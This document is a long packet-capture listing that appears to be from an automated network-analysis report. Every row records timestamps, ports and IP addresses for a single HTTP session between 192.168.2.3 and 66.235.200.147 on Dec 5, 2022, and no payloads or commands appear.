Dec 5, 2022 01:32:37.798564911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798588037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798609972 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.798612118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798625946 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.798635006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798657894 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798681021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798690081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.798705101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798717976 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.798727989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798751116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798777103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798790932 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.798799992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798821926 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798825026 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.798846960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798861027 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.798871040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.798904896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799088955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.799325943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799350977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799374104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799379110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.799397945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799412012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.799423933 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799446106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799468994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799483061 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.799495935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799509048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.799519062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799540997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799557924 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.799562931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799586058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799607992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799629927 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799635887 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.799649000 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.799653053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799674988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799698114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799712896 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.799721003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799736977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.799751043 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799773932 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799797058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799814939 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.799818993 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799841881 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799843073 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.799865007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799889088 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.799906969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.800318956 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800343037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800365925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800365925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.800385952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.800390005 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800414085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800436974 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800458908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800465107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.800482035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800486088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.800503969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800529003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800545931 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.800550938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800570965 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.800574064 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800597906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800621033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800643921 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800647974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.800667048 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800683022 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.800689936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800713062 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.800714016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800736904 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800760031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800774097 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.800781965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800796032 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.800806046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800827980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800849915 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800863028 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.800872087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.800884008 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.801301003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801325083 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801347971 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801371098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801382065 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.801393032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801403999 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.801415920 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801438093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801460028 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.801460028 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801482916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801484108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.801507950 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801531076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801554918 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.801554918 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801578999 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801589966 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.801601887 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801625013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801631927 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.801646948 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801668882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801692009 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801704884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.801713943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801736116 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.801738024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801759005 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.801759958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801783085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801806927 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801821947 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.801829100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801851988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.801857948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.801893950 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.802439928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802481890 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802510023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802534103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802552938 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.802557945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802580118 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.802581072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802603960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802628040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802647114 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.802650928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802671909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.802675009 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802697897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802720070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802742958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802746058 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.802766085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802769899 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.802788973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802813053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802834988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802836895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.802855968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802860022 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.802894115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802898884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.802917004 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802939892 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802962065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802984953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.802985907 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.803000927 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.803100109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.803141117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.803188086 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.804296970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.804321051 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.804343939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.804367065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.804389000 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.804418087 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.806097984 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806126118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806149960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806174040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806183100 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.806197882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806205988 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.806221962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806246042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806256056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.806268930 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806293011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806299925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.806315899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806338072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806345940 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.806370974 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806395054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806416035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.806418896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806442022 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806447029 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.806463003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806488037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806512117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806534052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806544065 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.806557894 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806581020 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806606054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806611061 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.806629896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806634903 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.806653976 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806675911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806679010 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.806699038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806720972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806744099 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806744099 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.806766987 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.806767941 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806791067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806813002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806834936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806842089 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.806853056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.806859016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806893110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806905031 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.806919098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806941986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806967020 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.806988001 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.806991100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807014942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807028055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.807037115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807049990 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.807060003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807084084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807106018 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.807106972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807130098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807152987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807173967 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.807176113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807204008 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.807384014 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807408094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807430029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807452917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807461023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.807476044 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807487011 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.807498932 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807522058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807524920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.807543993 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807566881 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807589054 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.807590008 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807611942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807615042 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.807636023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807658911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807682991 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807699919 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.807708025 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807729959 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807734013 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.807744026 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.807753086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807775021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807797909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807813883 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.807820082 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807832956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.807842016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807864904 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807888031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807904005 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.807910919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807934046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.807934999 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.807996988 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.809108973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809134007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809155941 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809180021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809200048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.809205055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809228897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809247017 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.809252024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809274912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809279919 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.809298038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809319973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809343100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809345007 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.809365988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809372902 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.809390068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809412003 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.809412956 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809437990 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809451103 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.809459925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809485912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809509039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809525967 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.809530973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809554100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809556007 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.809575081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809597015 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809613943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.809619904 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809637070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.809642076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809664965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.809704065 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.810205936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.810230970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.810254097 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.810269117 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.810276985 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.810292959 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.810301065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.810323000 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.810345888 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.810367107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.810369015 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.810384989 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.810391903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.810415030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.810437918 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.810461044 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.810462952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.810484886 CET	49705	80	192.168.2.3	66.235.200.147
